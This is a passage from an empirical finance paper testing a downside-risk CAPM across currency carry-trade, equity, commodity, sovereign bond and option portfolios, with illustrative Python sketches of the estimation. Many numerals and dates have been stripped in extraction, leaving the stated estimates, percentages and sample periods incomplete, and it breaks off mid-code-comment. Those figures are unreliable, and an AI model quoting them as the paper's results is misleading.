where i* and i are the foreign and US interest rate, and s_t is the log spot exchange rate expressed in foreign currency per US dollar. Figure shows that the sorting produces a monotonic increase in returns from portfolios 1 to 6. Further descriptive statistics are reported in Table. Portfolios 6A and 6B highlight the very different behavior of high inflation currencies. The standard deviation of returns for portfolio 6B is almost double that of all other baskets. Bansal and Dahlquist (2000) note that the uncovered interest parity condition cannot be rejected for these currencies. These findings and the general concern about the effective tradability of these currencies during periods of economic turmoil lead us to present our benchmark results using only basket 6A and to provide robustness checks including both baskets 6 and 6B in the online appendix. For our benchmark results on the cross section of equity returns we use the 6 Fama & French portfolios sorted on size and book-to-market for the period from January 97 to March. In additional results we also test our model on the cross section of industry-sorted equity portfolios by Fama & French for the period from January 97 to March, on the CAPM-beta sorted equity portfolios of Frazzini and Pedersen () for the period from January 97 to March, and on the equity index option returns series by Constantinides, Jackwerth, and Savov (2013) for

⁵ We view our results excluding the high inflation currencies as conservative since these noisy observations are eliminated. Our results are robust to different threshold levels or to the inclusion of all the currencies in the 6th portfolio. The inflation data for all countries is from the IMF International Financial Statistics.
⁶ A country is considered developed if it is included in the MSCI World Equity Index.
8 the period from April 96 to March. For the cross section of commodity returns we use the commodity-futures portfolios sorted by the commodity basis for the period from January 97 to December by Yang (). For the cross section of sovereign bonds we use the 6 sovereign-bond portfolios sorted by the probability of default and bond beta for the period from January 99 to March by Borri and Verdelhan (). For the market return we use the value-weighted CRSP US equity market log excess return for the period January 97 to March. We use a broad US equity market return as the market return in our benchmark results not only because it is the most commonly used return to test CAPM-like asset pricing models, but also to conservatively avoid increasing the covariances between test assets and pricing factors by including our other test assets, such as currencies and commodities, in our market index. Nonetheless, in robustness checks included in the appendix we repeat our benchmark analysis using the MSCI World Market Equity Index returns and our own market index built by merging all our test assets in a single index. Tables and 3 provide summary statistics for the equity, equity index options, commodity futures and sovereign bond portfolios returns. In Table, Panel A highlights the pattern that small and value stocks have higher returns; Panel B highlights that futures on commodities that have low basis have higher returns; Panel C highlights that sovereign bonds have higher returns whenever they have lower credit rating and/or higher CAPM beta. In Table 3, Panel A highlights that equities that have high preformation CAPM-beta tend to earn (somewhat) lower returns; Panel B creates a cross section by sorting equities on their industry classification; Panels C and D show that portfolios that are short equity index put options and long call options earn higher returns the shorter the further the options are out of the money and the shorter (longer) the maturity for puts (calls). B. Conditional Correlations The central insight underlying our work is that the currency carry trade, as well as other cross-sectional strategies, is more highly correlated with aggregate returns conditional on low aggregate returns than it is conditional on high aggregate returns. This insight is supported by a growing empirical literature including Brunnermeier, Nagel, and Pedersen (), Burnside (a), Lustig and Verdelhan (), Christiansen, Ranaldo, and Soederlind (), Mueller, Stathopoulos, and Vedolin () all of which find a state dependent correlation. In ongoing work, Caballero and Doyle (3) and Dobrynskaya (3) highlight the strong correlation of the 7
9 carry trade with market risk during market downturns. Our paper differs from all previous studies both by providing systematic evidence over a longer time period and larger sample of this state dependent correlation and by relating the resulting downside risk to that observed in other asset classes such as equities, equity index options, commodities, and sovereign portfolios. We define the downstate to be months where the contemporaneous market return is more than one standard deviation below its sample average. A one standard deviation event is a reasonable compromise between a sufficiently low threshold to trigger concerns about downside risk and a sufficiently high threshold to have a large number of downstate observations in the sample. Our definition assigns monthly observations to the downstate, out of 3 total observations in our sample. For robustness we test our model with different threshold levels as well as a finer division of the state space into three rather than two states. 7 Table shows that the carry trade is unconditionally positively correlated with market returns. The correlation is. and statistically significant for our benchmark sample and robust to the exclusion of emerging markets or to various thresholds of inflation for the basket 6B. The table also shows that most of the unconditional correlation is due to the downstate: conditional on the downstate the correlation increases to.33, while it is only.3 in the upstate. Figure 3 highlights this characteristic of the data by plotting the kernel-smoothed conditional correlation between the carry trade and the market returns. The top panel shows that the correlation of high yield currencies with the market returns is a decreasing function of market returns. The opposite is true for low yield currencies in the middle panel. The bottom panel highlights that our results are not sensitive to the exact choice of threshold. II Econometric Model We estimate the model in () with the two-stage procedure of Fama and MacBeth (973). In our model the first stage consists of two time-series regressions, one for the entire time series and one for the downstate observations. These regressions produce point estimates for the unconditional and downstate betas, ˆβ and ˆβ, which are then used as explanatory variables in the second stage. The second-stage regression is a cross-sectional regression of the average return of the assets on their unconditional and downstate betas. In our estimation we restrict, following the theory section above, the market price of risk to equal the sample average of the market excess-return. 7 Thresholds of the sample average minus. or. standard deviations assign observations and 7 observations to the downstate, respectively. The upstate includes all observations that are not included in the downstate.
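The split-sample correlations described above (unconditional, downstate, and upstate) can be tabulated directly from a carry-trade return series and a market return series. The sketch below is illustrative only and is not the authors' code; both return series are placeholders, and the one-standard-deviation cutoff follows the definition of the downstate given in the text (the kernel-smoothed version in Figure 3 would require a smoother instead of a hard split).

```python
# Illustrative sketch (not the authors' code): correlation of a carry-trade return
# series with the market, unconditionally and conditional on the down/up state.
import numpy as np

def state_correlations(carry_ret, mkt_ret, n_std=1.0):
    cutoff = mkt_ret.mean() - n_std * mkt_ret.std()
    down = mkt_ret < cutoff                     # downstate months
    up = ~down                                  # all remaining months
    corr = lambda x, y: np.corrcoef(x, y)[0, 1]
    return {
        "n_down": int(down.sum()),
        "unconditional": corr(carry_ret, mkt_ret),
        "downstate": corr(carry_ret[down], mkt_ret[down]),
        "upstate": corr(carry_ret[up], mkt_ret[up]),
    }

# placeholder series for illustration only: the carry series loads more heavily
# on negative market realizations, mimicking the asymmetry described in the text
rng = np.random.default_rng(1)
mkt_ret = rng.normal(0.004, 0.045, 468)
carry_ret = 0.1 * mkt_ret + 0.4 * np.minimum(mkt_ret, 0) + rng.normal(0, 0.02, 468)

print(state_correlations(carry_ret, mkt_ret))
```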
Therefore, in the second-stage regression we estimate a single parameter: the downside price of risk λ⁻. Formally, the first-stage regressions are:

r_{it} = a_i + β_i r_{mt} + ε_{it},  ∀ t ∈ T,  (3)
r_{it} = a_i⁻ + β_i⁻ r_{mt} + ε_{it}⁻,  whenever r_{mt} ≤ r̄_m − σ_{r_m},  (4)

where r̄_m and σ_{r_m} are the sample average and standard deviation of the market excess return, respectively. The second-stage regression is given by:

r̄_i = β̂_i r̄_m + (β̂_i⁻ − β̂_i) λ⁻ + α_i,  i = 1, ..., N,  (5)

where r̄_i and r̄_m are the average excess returns of the test assets and the market excess return, respectively, and α_i are pricing errors. Notice that by not including a constant in the second-stage regression we are imposing that an asset with zero beta with the risk factors has a zero excess return.⁹ While restricting the model so that the market return is exactly priced reduces the number of coefficients to be estimated in the cross-sectional regression, it does not imply that the sample average market return is estimated without noise. The average monthly excess return of the value-weighted CRSP US equity market for the sample period from January 97 to March is .39% with a standard error of .3%. This corresponds to an annualized log excess return for the market of .6%, an estimate in the range of the values usually assumed to calibrate the equity premium. To make clear that the unconditional market price of risk is imposed rather than estimated in our cross-sectional regressions, we report its estimate with a star and do not report its standard error in all tables of the paper. While restricting the market to be exactly priced is regarded as a conservative procedure, we report in the appendix our benchmark results without imposing this restriction and note that in that case we recover an estimate of the price of unconditional market risk of .9 that is similar to the sample average estimate of .39 imposed in the rest of the paper.

⁹ In unreported results we estimated the model including a constant in the cross-sectional regression and verified that the constant is not statistically significant.
¹⁰ When estimating the model on sub-periods, we always impose that the average market return over that sub-period is priced exactly by correspondingly adjusting the value of λ.
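A minimal sketch of the two-stage procedure in equations (3)-(5) is given below. It is not the authors' code: the portfolio and market return series are simulated placeholders, the downstate threshold follows equation (4), and the second stage estimates only the downside price of risk λ⁻ with the unconditional price of risk fixed at the sample mean market excess return, as described in the text. Standard errors and the corrections discussed later are omitted, and the printed estimate reflects only the placeholder data.

```python
# Illustrative sketch (not the authors' code) of the two-stage procedure in
# equations (3)-(5): time-series regressions over the full sample and the
# downstate, then a cross-sectional regression that estimates only lambda_minus,
# with the market price of risk fixed at the sample mean market excess return.
import numpy as np

def dr_capm_fama_macbeth(port_ret, mkt_ret, n_std=1.0):
    T, N = port_ret.shape
    mkt_bar, sigma = mkt_ret.mean(), mkt_ret.std(ddof=1)
    down = mkt_ret <= mkt_bar - n_std * sigma          # downstate months, eq (4)

    def ts_slope(y, x):                                 # OLS slope with intercept
        X = np.column_stack([np.ones(len(x)), x])
        return np.linalg.lstsq(X, y, rcond=None)[0][1]

    beta = np.array([ts_slope(port_ret[:, i], mkt_ret) for i in range(N)])                 # eq (3)
    beta_minus = np.array([ts_slope(port_ret[down, i], mkt_ret[down]) for i in range(N)])  # eq (4)

    # second stage, eq (5): r_bar_i - beta_i * r_bar_m = (beta_minus_i - beta_i) * lambda_minus + alpha_i
    y = port_ret.mean(axis=0) - beta * mkt_bar
    x = beta_minus - beta
    lambda_minus = (x @ y) / (x @ x)                    # no-constant cross-sectional OLS
    alpha = y - x * lambda_minus                        # pricing errors
    # cross-sectional R2 in the spirit of the paper's definition (ddof choice is an assumption)
    r2 = 1.0 - (alpha @ alpha) / (N * np.var(port_ret.mean(axis=0)))
    return beta, beta_minus, lambda_minus, alpha, r2

# placeholder data for illustration only
rng = np.random.default_rng(2)
mkt_ret = rng.normal(0.004, 0.045, 480)
port_ret = 0.4 * mkt_ret[:, None] + 0.3 * np.minimum(mkt_ret, 0)[:, None] * np.linspace(0, 1, 6) \
           + rng.normal(0, 0.02, (480, 6))
print("estimated lambda_minus:", dr_capm_fama_macbeth(port_ret, mkt_ret)[2])
```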
III Empirical Results
A. Risk Premia: Currency
We find that while the CAPM shows that currency returns are associated with market risk, it cannot explain the cross section of currency returns because the CAPM beta is not sufficient to explain the cross-sectional dispersion in returns. The left panel of Figure shows that the increase in CAPM beta going from the low yield portfolio (portfolio 1) to the high yield portfolio (portfolio 6) is small compared to the increase in average returns for these portfolios. As it will shortly become evident, once the market price of risk of CAPM is pinned down by the average market excess return, CAPM fails to price these currency portfolios. The middle panel of Figure shows that average currency returns are also strongly related to the downstate beta. While this finding supports the importance of downside risk for currency returns, it is not per se evidence of a failure of CAPM because currencies that have a higher downstate beta do have a higher CAPM beta. However, the right panel of Figure shows that the relative beta, the difference between downstate and unconditional beta, is also associated with contemporaneous returns. Currencies that have higher downstate than unconditional beta are on average riskier and earn higher excess returns. We show in our benchmark regressions that this state dependency is not fully captured by the CAPM beta. Figure and Table illustrate both the failure of CAPM and the performance of the DR-CAPM. The top panels of Figure present the results employing all currencies, the bottom panels present the results employing only currencies of developed countries. Since higher yield currencies have higher CAPM beta, they earn a higher return on average. However, the CAPM beta does not fully capture the risk-return tradeoff: the spread in betas is too small to account for the spread in currency returns. The failure is evident in the first column of Table, where CAPM cannot jointly price the market return and the cross section of currency returns, producing an R² of only %. Correspondingly, the left panels of Figure show that CAPM predicts almost identical returns for all currency portfolios. In contrast, the DR-CAPM explains the cross section of currency returns. In the second column of Table, the DR-CAPM explains 79% of the cross-sectional variation in mean returns even after imposing the restriction that the market portfolio (included as a test asset) is exactly
¹¹ We assess the explanatory power of the model using a cross-sectional R² defined as: R² = 1 − α̂′α̂ / [N Var(r̄)], where α̂ is the vector of pricing errors, Var(r̄) is the variance of the vector of test assets' mean returns, and N is the number of test assets.
12 priced. The right quadrants of Figure correspondingly show that the test assets lie close to the degree line. The estimated price of downside risk is positive (.) and statistically significant. 3. The model fits the returns of portfolios to 6A with small pricing errors. The absolute pricing error is on average.7% (in terms of monthly excess returns) across these portfolios. Portfolio, which contains the low yield currencies, is priced with the biggest pricing error,.%. We also report the χ test that all pricing errors in the cross-sectional regression are jointly zero. While both the CAPM and the DR-CAPM are formally rejected with p-values of % and.% respectively, we stress that the DR-CAPM produces a root mean square pricing error (RMSPE) that is % smaller than that of CAPM. Potential sources of concern about the reliability of our currency returns are sovereign default and international capital restrictions. To alleviate these concerns, we test the DR-CAPM on a subsample of developed countries currencies. The results for this subsample of countries are also reported in Figure and Table and show that the model performs equally well on these portfolios. The price of downside risk is.3 and is consistent with the. estimate obtained on the full sample and the R increases to %. We confirm on this subsample the pattern of small DR-CAPM pricing errors for all portfolios except portfolio. The null hypothesis of zero joint pricing errors cannot be rejected at the % confidence level with a p-value of the χ test of %. The RMSPE of.% is almost % smaller than the one produced by CAPM on the same test assets. B. Risk Premia: Other Asset Classes The conditional association of asset returns and the market portfolio and the variation in prices of risk is not unique to currencies and is, in fact, shared by other asset classes. Providing a unified risk-based treatment of expected returns across asset classes is both informative from a theoretical This procedure assumes that the market risk premium is measured without error but has the benefit of reducing the number of free parameters. Including the market return as a test asset and estimating the risk premium freely does not alter our results since the estimated market risk premium is close to the average market excess return, see the online appendix for details. 3 The Fama MacBeth procedure does not automatically correct the second-stage regression standard errors for estimated regressors from the first-stage. Given our separate first-stage regressions for the full sample and the downstate, the Shanken correction (Shanken (99)) is not immediately applicable here. In the robustness section of this paper and in the appendix, we provide a number of checks of the standard errors to minimize concerns about their reliability. Note that the pricing errors here and in all subsequent tables and references in the text are expressed in monthly percentage excess returns, while the figures are annualized percentage excess returns. The pricing errors are defined as the difference between the actual and model-predicted excess return, so that a positive price error corresponds to an under prediction of the return by the model. The test is under the null hypothesis of zero joint pricing errors, therefore the model is not rejected at the % confidence level if the p-value statistic is higher than %.
13 perspective and an important check of the empirical performance of theoretical models. Figure 6 shows that equity, commodity, and sovereign bond portfolios expected returns are positively related to these assets relative downside betas. In all three asset classes, assets that are more strongly associated with market returns conditional on the downstate than unconditionally have higher average excess returns. This conditional variation which is not captured by CAPM is the central mechanism that underlies the performance of the DR-CAPM across asset classes. We investigate next whether the DR-CAPM can jointly explain the cross section of currency and equity returns. We add the 6 Fama & French portfolios sorted on book-to-market and size to the currency and market portfolios as test assets. Figure 7 and Table 6 show that the DR-CAPM jointly explains these returns. The estimated price of downside risk is consistent across asset classes but the estimate of. is lower than that obtained on currencies alone (.). 6 The model explains 7% of the observed variation in mean returns, a noticeable increase over the % explained by CAPM. Figure 7 shows that the largest pricing errors occur for the small-growth equity portfolio (portfolio 7) in addition to the low-yield currency portfolio (portfolio ). The average absolute pricing error on all other portfolios is.%, while the pricing errors on the small-growth equity portfolio and the low-yield currency portfolios are -.% and -.7%, respectively. Section V.B. provides further details about the pricing of the small-growth equity portfolio. Both CAPM and the DR-CAPM are statistically rejected with p-values of the χ test of % and.3% respectively, but the DR-CAPM produces a RMSPE two thirds smaller than CAPM. A close analog to the currency carry trade is the basis trade in commodity markets. The basis is the difference between the futures price and the spot price of a commodity. Among others, Yang () shows that commodities with a lower basis earn higher expected returns (see Table Panel B). 7 We extend our results by adding the commodity portfolios to the currency and equity portfolios. Figure and Table 7 show that the same economic phenomenon, the conditional variation of the quantity and price of market risk, underlies the variation in expected returns in commodity markets. The estimated price of downside risk (.) is essentially unchanged after the addition of the commodity portfolios to the currency and equity portfolios studied above and is statistically significant. The model explains 7% of the cross sectional variation in returns across these asset classes compared to an adjusted R of -7% for CAPM. The biggest pricing error occurs for the high-basis commodity portfolio (portfolio ) in addition to the low-yield 6 If the small-growth equity portfolio is excluded as a test asset, the estimated price of risk increases to.7. Section V.B. provides a detailed discussion of the returns and pricing of the small-growth equity portfolio. 7 Also see Gorton, Hayashi, and Rouwenhorst (3).
14 currency portfolio (portfolio ) and the small-growth equity portfolio (portfolio ). The pricing errors for these three portfolios are -.%, -.%, and -.6%, respectively. The average absolute pricing error of all other portfolios included as test assets is.7%. While both CAPM and the DR-CAPM are again statistically rejected, the DR-CAPM produces a RMSPE % smaller than CAPM. We investigate next whether sovereign bonds are priced by the DR-CAPM. We use the cross-sectional sorting of sovereign bonds according to default probability and market beta in Borri and Verdelhan (). Figure 9 and Table confirm yet again the ability of the DR-CAPM to price multiple asset classes. An important caveat in this case is that the data of Borri and Verdelhan () are only available over a relatively short sample period (January 99 to March ), thus limiting the number of observations, particularly for our downstate. The shorter sample produces noisier estimates of the prices of risk and different point estimates overall from our full sample. The sample limitations impose caution in interpreting the positive performance of our model on sovereign bonds. Consequently, we exclude these portfolios from the analysis in the rest of the paper. In our benchmark results for equity markets we employ the Fama & French book-to-market and size sorted portfolios because they are among the most commonly tested equity cross sections. In addition, we document here that the DR-CAPM can rationalize a number of other important cross-sections in equity markets: the CAPM-beta sorted cross section, the industry sorted cross section, and the equity index options cross section. In Figure and Table 9 we analyze the performance of the DR-CAPM for the cross section of CAPM-beta sorted equity portfolios of Frazzini and Pedersen () as well as for their Betting Against Beta (BAB) factor for equity markets. The DR-CAPM has higher explanatory power than CAPM for the joint cross section of currency, commodity and beta-sorted equity returns with estimates of the market price of downside risk consistent with those estimated on other cross sections. Notably the BAB factor has a.3% pricing error under CAPM that is almost seven times bigger than the.% pricing error under the DR-CAPM. We have documented that for the cross-section of currencies, commodities and Fama & French portfolios CAPM under-predicts the returns and the downside risk factor is able to fill the gap between the CAPM predicted returns and the actual returns in the data. Interestingly, for the beta-sorted portfolios CAPM over-predicts the returns of the high-beta portfolios with respect to the low beta portfolios; a fact that Frazzini and Pedersen () refer to as a too flat Capital By construction the BAB factor is long low beta equities and short high beta equities with the position adjusted to be market neutral (zero CAPM beta). See original reference for details. 3
15 Market Line in the data. The DR-CAPM in part corrects the over-prediction of CAPM because high-beta equities have a relatively lower downside risk exposure compared to low-beta equities. For example, consider the BAB factor in the top panels of Figure : by construction it has a CAPM beta close to zero, estimated at -. and not statistically significant, and its riskiness is entirely captured by its downside beta, estimated at. and statistically significant (see Panel A Table ). 9 Therefore, for the BAB portfolio CAPM implies an annualized expected excess return of -.9%, while the DR-CAPM predicts a return of.3% which is substantially closer to the actual average return of.3%. This result is consistent with the analysis in Frazzini and Pedersen () who note that the BAB factor performs particularly poorly when the overall market return is low, thus naturally generating a downside risk exposure. In Figure and Table we test the DR-CAPM on the industry-sorted equity portfolios of Fama & French. We consistently find that the DR-CAPM can rationalize these test assets with a price of downside risk, here estimated at., similar to that estimated on other crosssections. The model explains 7% of the joint variation in returns of currencies and equity industry portfolios with a substantial increase over the 3% explained by CAPM. Finally, we investigate whether the DR-CAPM can rationalize option returns. Options, and in particular portfolios short in put options written on the market index, are naturally exposed to downside risk. We test the model on the cross-section of equity index (S&P ) option returns in Constantinides et al. (3). Figure and Table present the result based on the cross-section of both calls and puts, while Figure 3 and Table focus only on the puts. The DR-CAPM not only captures % of the variation in expected returns across option portfolios, but can also jointly rationalize this variation together with the returns of currencies and commodities (R of 7%). This further confirms that the estimated value of the price of downside risk (λ ) is consistent across asset classes even when considering optionality features. In contrast CAPM cannot rationalize the option returns. By construction the option portfolios have a CAPM beta close to (see Panel A Table ), thus generating almost identical CAPM-predicted returns for all portfolios, but have substantial variation in realized average 9 Frazzini and Pedersen () build the BAB factor to have zero CAPM beta. Small differences in the beta occur here because of the use of a different index to proxy for the CAPM market portfolio as well as a different time period. The CAPM prediction is obtained by multiplying the beta times the market price of risk (-.*.3*=-.9). Similarly the DR-CAPM prediction is obtained by summing to the CAPM prediction the downside risk correction of pβ βqλ p. `.q.6.9. The cross section includes portfolios of calls (9) and puts (9) sorted on maturity and in-the-moneyness. See original source for portfolio construction details.
16 excess returns (close to a % range). Almost all option portfolios are accurately priced with small pricing errors with the exception of the 3-day maturity and 9 moneyness put portfolio. 3 Constantinides et al. (3) report that this portfolio is hard to price even for most option-market-tailored asset pricing models and consider the possibility that liquidity issues might affect its pricing. We have shown that the DR-CAPM can rationalize a number of important asset classes and that the estimate of the price of risk remains stable across different estimations. While this reduces concerns about the reliability of estimates of λ, further quantitative implications of our empirical framework, for example about the magnitude of λ, cannot be drawn without imposing a more structural theory on the model. We leave the development of a structural theory to future work and only note here that λ is consistently estimated across a number of different cross sections, asset classes and patterns in expected returns. For completeness we also report in Section V.E. a number of alternative test assets whose return factor structure cannot be rationalized by the DR-CAPM. IV Robustness An important verification of our results is to confirm the association of currency returns with downside market risk. In Panel A of Table 3 we provide the first-stage estimates of the unconditional CAPM betas and the downstate betas for the six currency portfolios. The CAPM betas are increasing from portfolio to 6 and the spread in betas between the first and last portfolio is statistically different from zero. The increase in betas, however, is small; the beta of the first portfolio is.3 while the beta of the last portfolio is.. We provide both OLS and bootstrapped standard errors. The downstate betas highlight the central mechanism of the DR-CAPM: conditional on below-threshold market returns, high yield currencies (portfolio 6A) are more strongly related to market risk than low yield currencies (portfolio ). In fact, we find that while the downside beta of portfolio 6A (.3) is larger than its unconditional beta (.), Recall that Constantinides et al. (3) build the option portfolios by imposing that under the Black and Scholes assumptions they would have CAPM beta of with the S&P index. The variation in CAPM betas reported here with respect to the original source is due to the use of the value-weighted CRSP as a market index as well as a different time period for the sample. 3 This is the shortest maturity and furthest out of the money portfolio in the sample. Ultimately, the quantitative importance of downside risk can also be linked to the rare disasters model of Barro (6). Farhi and Gabaix () develop a model of exchange rates in the presence of rare disasters and Farhi, Fraiberger, Gabaix, Ranciere, and Verdelhan () and Jurek () evaluate rare disasters in currency markets in an option framework. We employ a smoothed bootstrap scheme consisting of resampling empirical residuals and adding zero centered normally distributed noise using, iterations.
17 the opposite is true for portfolio with a downside beta of. and an unconditional beta of.3. Splitting the sample into the downstate picks up the conditional variation in currencies association with market risk, but also reduces the variation available in each subsample to estimate the betas. Therefore, the standard errors of the first-stage regressions that estimate downstate betas are wider than those of the corresponding regressions for unconditional betas. We perform a number of robustness checks of our first-stage estimates and their impact on the second-stage estimates. We perform two bootstrap tests to check the robustness of the main driver of our results: the different conditional association of high yield and low yield currencies with the market excessreturn. We first test whether high yield currencies are more associated with market risk than low yield currencies conditional on the downstate under the null hypothesis that β 6A β. We then test whether the different loading on risk of high and low yield currencies varies across states under the null hypothesis that pβ 6A β q pβ 6A β q. Figure shows that both nulls are strongly rejected with p-values of.% and.%, respectively, thus yielding statistical support for our main economic mechanism. A second robustness check is to mitigate the concern that our second-stage regression employs potentially weak estimated regressors from the first stage. Table 3 reports the first-stage estimates for the 6 Fama & French equity portfolios. Since these equity portfolios have a strong association with the overall equity market, the betas are very precisely estimated even for the downstate. We then use the prices of risk estimated using only these equity portfolios to fit the cross section of currencies. Table reports that the DR-CAPM can still explain 67% of the observed variation in currency returns and 7% of the variation in currency and equity returns. The estimated price of downside risk is.7, statistically significant, and consistent with the estimate of. obtained on the joint sample of currencies and equities. 6 In Table 6 we verify that our results are not altered by reasonable variations in the threshold for the downstate. We vary our benchmark threshold for the market return of standard deviation below its sample mean to. and. standard deviations. In both cases we observe a consistent performance of the model. Finally, we verify the sensitivity of our results to different thresholds for excluding currencies with high inflation. We vary the inflation threshold from our benchmark of % above the annualized inflation of the US to % and %. Table 7 shows that the lower threshold produces 6 This robustness check also minimizes concerns about the reliability of second-stage Fama-Macbeth standard errors due to the presence of estimated regressors. Our results are little changed when employing first stage estimates that are very accurate. 6
18 higher but noisier estimates of the price of risk compared to the higher threshold. In both cases, however, the prices of risk are statistically significant and the R are around %. Further robustness checks are provided in the online appendix. We verify that our results are robust to: using only developed countries currencies, wintering the data, varying the inflation threshold for the last currency portfolios, not imposing the restriction that the market return be exactly priced in sample, alternative measures of the market index, estimating the model on a longer sample (and relative subsamples) for equity markets, and to using the model specification in Ang et al. (6). V Factor Structure and PCA Based Models To further investigate the common factor structure in the joint cross-section of currencies, equities, and commodities we perform a principal component analysis (PCA) both on each asset class separately and on their joint returns. This analysis allows us to compare the DR-CAPM to the asset-class-specific PCA-based models that are prevalent in the literature. A. Currency PCA Model For currencies, the PCA analysis leads to the model of Lustig et al. (). Consistent with their work, we report in Panel A of Table that the first two principal components account for 7% of the time series variation of the interest-rate-sorted currency portfolios. The loadings of the first principal component reveal that it can be interpreted as a level factor because it loads on the returns of all currency portfolios similarly. Analogously, the loadings of the second principal component reveal that it can be interpreted as a slope factor because it loads on the differential return when going from portfolio to portfolio 6. Intuitively, these two principal components can be approximated by two portfolios: an equally weighted portfolio of all currencies in the sample against the dollar and a carry trade portfolio created by a long position in portfolio 6 and a short position in portfolio. We refer to these two portfolios as the dollar and carry portfolios, and denote their returns by RX cur and HML cur respectively. To confirm the intuition, Table 9 reports in the top left panel that the correlation between the first principal component and the dollar portfolio is % and the correlation between the second principal component and the carry portfolio is 9%. Table and Figure present the estimates of both the PCA-based linear model of Lustig et al. () and the DR-CAPM on the cross-section of currency returns. The LRV model explains 7
19 6% of the cross sectional variation in currency returns. The estimated price of risk is statistically significant for the carry portfolio but not for the dollar portfolio. The model is statistically rejected by the χ test on the pricing errors with a p-value of %. Notice that it is the slope factor, the carry portfolio, that carries most of the information relevant for the cross section. A model that only includes the first principal component, the level factor or dollar portfolio, generates a R of only %. Similarly to the DR-CAPM, the largest individual pricing error (-.%) for the LRV model is for the low-yield currency portfolios (portfolio ). The DR-CAPM captures the information contained in the principal components that is relevant for this cross section. Intuitively, the DR-CAPM summarizes the two principal components because the unconditional market return acts as a level factor while downside risk acts as a slope factor. To confirm this intuition, recall from Table 3 that the unconditional market betas are relatively similar across currency portfolios, so that all portfolios load similarly on the market. In contrast, the downside betas are more strongly increasing going from portfolio to portfolio 6, thus providing a slope factor. The top two panels in Table 9 confirm that the second principal component (or the carry portfolio) is more highly correlated with the market portfolio in downstates (% correlation), thus loading on downside risk, than it is unconditionally (9% correlation). The DR-CAPM produces a R of 73% and RMSPE of.% that are similar to the R of 6% and RMSPE of.% of the LRV model. B. Equity PCA model The PCA on the cross-section of equities provided by the 6 Fama & French portfolios sorted on size and book-to-market leads to the three factor model of Fama and French (99). Panel B in Table shows that the first three principal components account for 9% of the time series variation of the size and book-to-market sorted portfolios. The loadings of the first principal component reveal that it can be interpreted as a level factor because it loads on the returns of all equity portfolios similarly. The loadings of the second and third principal components reveal that they can be interpreted as two slope factors. The second principal component mainly loads on the differential return when going from small portfolios ( to 3) to big portfolios ( to 6). The third principal component mainly loads on the differential return when going from growth portfolios ( and ) to value portfolios (3 and 6). However, notice that the interpretation is not as clear as it is for currencies (nor as it is for commodities below). For example, the third principal component does not affect portfolio and in a way consistent with its interpretation as a factor affecting the value-growth trade-off in returns.
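The principal component analysis used in this section can be sketched as follows. This is an illustrative implementation rather than the authors' code: the panel of portfolio returns is a placeholder, and the dollar-like and carry-like proxy portfolios are simply the equally weighted average and the last-minus-first spread of the columns. Principal component signs are arbitrary, so the correlations with the proxies may come out with either sign.

```python
# Illustrative sketch (not the authors' code): PCA of a panel of portfolio returns,
# with the "level" and "slope" interpretation checked by correlating the first two
# components against an equally weighted (dollar-like) portfolio and a
# last-minus-first (carry-like) portfolio. All inputs are placeholders.
import numpy as np

def pca_components(ret):
    """Return (explained_share, loadings, scores) for a T x N panel of returns."""
    X = ret - ret.mean(axis=0)                 # demean each portfolio series
    U, S, Vt = np.linalg.svd(X, full_matrices=False)
    explained = S**2 / np.sum(S**2)            # share of time-series variance per component
    scores = X @ Vt.T                          # time series of each principal component
    return explained, Vt.T, scores

# placeholder panel of 6 portfolio return series driven by a level and a slope factor
rng = np.random.default_rng(3)
level = rng.normal(0.002, 0.02, 480)
slope = rng.normal(0.003, 0.02, 480)
ret = level[:, None] + slope[:, None] * np.linspace(-0.5, 0.5, 6) + rng.normal(0, 0.01, (480, 6))

explained, loadings, scores = pca_components(ret)
dollar = ret.mean(axis=1)                      # equally weighted, level-like proxy
carry = ret[:, -1] - ret[:, 0]                 # high-minus-low, slope-like proxy

print("share of variance, first two PCs:", explained[:2])
print("corr(PC1, dollar):", np.corrcoef(scores[:, 0], dollar)[0, 1])
print("corr(PC2, carry): ", np.corrcoef(scores[:, 1], carry)[0, 1])
```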
20 We approximate the first principal component with the market return and the next two principal components by the Fama & French factors: the small-minus-big portfolio and the high-minus-low portfolio. We denote the returns of these two portfolios as SMB and HML ff, respectively. Table 9 shows in the bottom left panel that the first principal component is highly correlated with the market (9% correlation), the second principal component is mainly related to the SMB return (% correlation), and the third principal component is mainly related to the HML ff return (% correlation). However, HML ff and SMB returns are themselves correlated and therefore do not correspond exactly to the two principal components that are by construction orthogonal to each other. Correspondingly, we find that HML ff is also correlated with the second principal component and SMB is correlated with the third principal component. 7 Table and Figure 6 present the estimates of both the PCA-based linear model of Fama and French (99) and the DR-CAPM on the cross section of equity returns. The Fama & French three factor model explains 6% of the cross sectional variation in returns. The estimated prices of risk are significant for the market and HML ff but not for SMB. The model is statistically rejected by the χ test on the joint pricing errors with a p-value of %. Notice that the cross-sectional performance of the model is driven by the third principal component, which is approximated by the HML ff factor. A model based only on the first two principal components, which are approximated by the market and SMB returns, generates a R of %. The DR-CAPM is unable to match the small-growth equity returns of portfolio (pricing error of -.%) and therefore produces a lower R (33%) than the Fama & French three-factor model. As noted by Campbell and Vuolteenaho (), it is typical in the literature to find that models cannot correctly price portfolio and a number of papers (Lamont and Thaler (3), D Avolio (), Mitchell, Pulvino, and Stafford ()) have questioned whether its return is correctly measured. In the last column of Table we show that once we remove portfolio from the 6 Fama & French portfolios the DR-CAPM performance improves: the R increases to 9% and the hypothesis of zero joint pricing errors cannot be rejected by the χ test at the % confidence level. 7 The correlation between HML ff and SMB helps to rationalize why the interpretation of the equity principal components in terms of mimicking portfolios is not as clear as it is for currencies or commodities. In the case of currencies and, as will shortly be illustrated, in the case of commodities, the proxy portfolios of the two principal components are themselves almost uncorrelated. For example, the correlation between RX cur and HML cur is only.7. Note that these papers refer to portfolio as the small-growth portfolio in the -portfolio sorting of Fama & French, while our first portfolio is the small-growth portfolio in the 6-portfolio sorting of Fama & French. Our first portfolio, therefore, includes more securities than those considered troublesome in the cited papers. In the appendix, however, we verify that the DR-CAPM mispricing of the first portfolio in our setting is due to the securities that are part of the three smallest growth portfolios in the -portfolio sorting. Our results, therefore are consistent with the previous evidence on small-growth stocks. 9
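For comparison with the restricted DR-CAPM second stage above, the PCA-based benchmarks in this section (the LRV dollar/carry model and the Fama & French three-factor model) use a two-pass regression with freely estimated prices of risk on several factors. The sketch below illustrates that generic two-pass estimation and the effect of dropping a single troublesome test asset on the cross-sectional R², in the spirit of the small-growth portfolio exercise just described; all factor and portfolio series are placeholders, not the data used in the paper.

```python
# Illustrative sketch (not the authors' code): two-pass estimation of a linear
# multi-factor model (e.g. market plus SMB-like and HML-like factors), with the
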